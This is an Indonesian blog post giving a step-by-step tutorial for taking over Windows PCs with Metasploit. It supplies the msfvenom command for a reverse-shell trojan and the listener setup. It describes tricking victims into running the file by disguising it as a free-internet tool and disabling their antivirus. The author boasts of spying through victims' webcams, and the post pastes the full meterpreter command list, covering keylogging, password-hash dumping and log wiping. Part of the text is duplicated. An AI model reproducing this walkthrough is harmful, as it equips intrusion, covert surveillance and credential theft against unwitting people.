Yoww sahabat blogger semua... sekian lama gue gag posting , karna masih ada urusan sama master L buat belajar ngeRAT di public, tau RAT ?? remote akses trojan , begitulah saya mengartikannya, mungkin saja ada yang mengartikan hal yang lain, tapi saya tau kepanjangan RAT itu sebenarnya hanya sekedar pernah dengar saja, remote akses trojan .. artinya kita ngirim trojan ke target, lalu trojan memberikan akses kepada pemiliknya (gueh) , simpel nya gue ngontrol laptop/pc/hp korban ^_^ tapi kali ini gue bukan mau nyebarin ilmu dari master L, tapi mau bagiin cara hack windos 7, bukan cuma windows 7 sebenarnya, tapi untuk semua versi windows, beberapa pekan lalu saya share cara hack windows xp, lalu apa bedanya dengan yg ini ? bedanya adalah kalau windows xp kita tidak perlu backdoor, tapi kalau windows 7 kita menggunakan backdoor.
backdoor itu sejenis aplikasi yg membuka pintu akses kepada kita untuk bisa mengakses windows tanpa sepengetahuan user, nah dalam tutorial ini gue pakek os backbox linux turunan usus buntu(ubuntu), tapi kalian bisa pakai os apa saja terserah kalian asalkan tools nya ada ^_^ , nah di tutorial ini hanya menggunakan metasploit, dan msfvenom untuk membuat backdoornya.
oiya ini kita hanya bisa dalam satu jaringan lokal saja, kalo mau main di public alias jaringan luas alias internet, bisa pakai VPS, virtual private server, yaitu kita punya komputer server virtual milik kita sendiri. selebihnya googling ^_^
pertama sesi pembuatan backdoor, di sini menggunakan msfvenom, pertama buka terminal dengan cara tekan tombol ctrl+T atau cari di menu, lalu ketik di terminal kayak gini
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=1998 -f exe > inject.exe
keterangan nya -p itu maksudnya payload, dan payload yang di pakai adalah windows/meterpreter/reverse_tcp dan LHOST adalah localhost dan 192.168.56.101 itu adalah ip address gue,cara cek ip address dengan perintah ifconfig, LPORT itu port yang akan di gunakan, bisa ngacak terserah, saya pakai port 1998 ^_^ suka-suka, asal jangan pakai port port yang sudah terpakai, contoh jika ada service apache di port 80 maka kita tidak boleh memakai port 80. -f itu untuk format, karna backdoornya untuk windows, maka tentu saja kita pakai format exe, dan saya pakai nama inject.exe supaya nanti saya bisa bermain soceng(social engineering) alias tipuan, dengan bilang bahwa ini adalah inject tool terbaru telkomsel untuk gratis internet.
nah seperti contoh diatas, setelah selesai jalankan perintah diatas maka akan ada file baru bernama inject.exe , ketik perintah ls *.exe untuk menampilkan semua file exe yang ada, atau bisa cek di file explore di direktori /home/johnes/ nah copykan backdoor inject.exe itu ke laptop/pc target. lalu buat metasploit kita dalam mode listening
pertama buka metasploit dengan pertintah
msfconsole
lalu ketik seperti ini
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 1001
exploit
yang merahh itu ip address dan port di sesuaikan seperti saat buat backdoor dengan msfvenom tadi.
nah setelah sampai di sini kita minta target untuk menjalankan file inject.exe nya, nah logikanya gini, setelah kita jalankan perintah exploit , itu artinya pc kita sudah berada dalam mode mendengarkan gerak gerik target, nah setelah target menjalankan file inject.exe maka pc kita akan menangkapnya dan menciptakan sebuah session, sehingga kita bisa mengontrolnya, sebelum itu pastikan untuk mematikan atau mendisable anti virus di komputer target, karna backdoor yang kita buat tadi masih sangat sederhana, belum kebal dari antivirus, dan antivirus akan mendeteksinya sebagai trojan dan menghapusnya sebelum kita sempat menjalankannya, tapi jangan khawatir, next time saya share cara agar backdoor yang kita buat tidak terdeteksi anti virus.
nah jika suda seperti diatas artinya kita sudah mendapat akses ke komputer target
perintah sysinfo untuk melihat info tentang target
perintah shell untuk mendapat akses kayak kita ngakses cmdnya si korban, sebenarnya saya praktekan ini dengan target windows xp, karna gag ada lawan yang windows 7, tapi sebenarnya sama saja, jika memakai backdoor, semua versi windows pasti bisa kita hack.
perintah screenshot untuk menscreenshot layar korban
ada juga perintah yang paling gue demen, webcam_snap ini perintah untuk mendapatkan snapshot dari webcam korban. berikut daftar perintah yang bisa kita pakai
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
nah tentusaja gag akan gua jelaskan perintah sebanyak itu, bisa di coba-coba sendiri ^_^ untuk pertanyaan dan saran bisa ke email gua ini atau bisa tanya di fanspage fb gue di malkulsec.
okey itu saja yang bisa saya sampaikan pada tutorial ini,
semoga bermanfaat
kutang lebihnya saya mohon maaf
sekian aurakasih.
.
.
.
.
tinggalkan jejak jing.
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
nah tentusaja gag akan gua jelaskan perintah sebanyak itu, bisa di coba-coba sendiri ^_^ untuk pertanyaan dan saran bisa ke email gua ini atau bisa tanya di fanspage fb gue di malkulsec.
okey itu saja yang bisa saya sampaikan pada tutorial ini,
semoga bermanfaat
kutang lebihnya saya mohon maaf
sekian aurakasih.
.
.
.
.
tinggalkan jejak jing.
3 komentar untuk Hack semua versi Windows dengan metasploit.
Perlihatkan Semua Komentar Tutup Semua Komentar
saya pke modem, apakah cocok atau bisa sya ikuti tutor ini ?
Balas Hapusitu untuk local network, kalau mau main di public bisa coba port forwarding, pakai vps, atau bisa coba pakai vpn pptp jika menggunakan modem
Balas Hapushttp://malkulsec.blogspot.co.id/2017/01/cara-memakai-vpn-pptp-di-backbox.html
Balas Hapus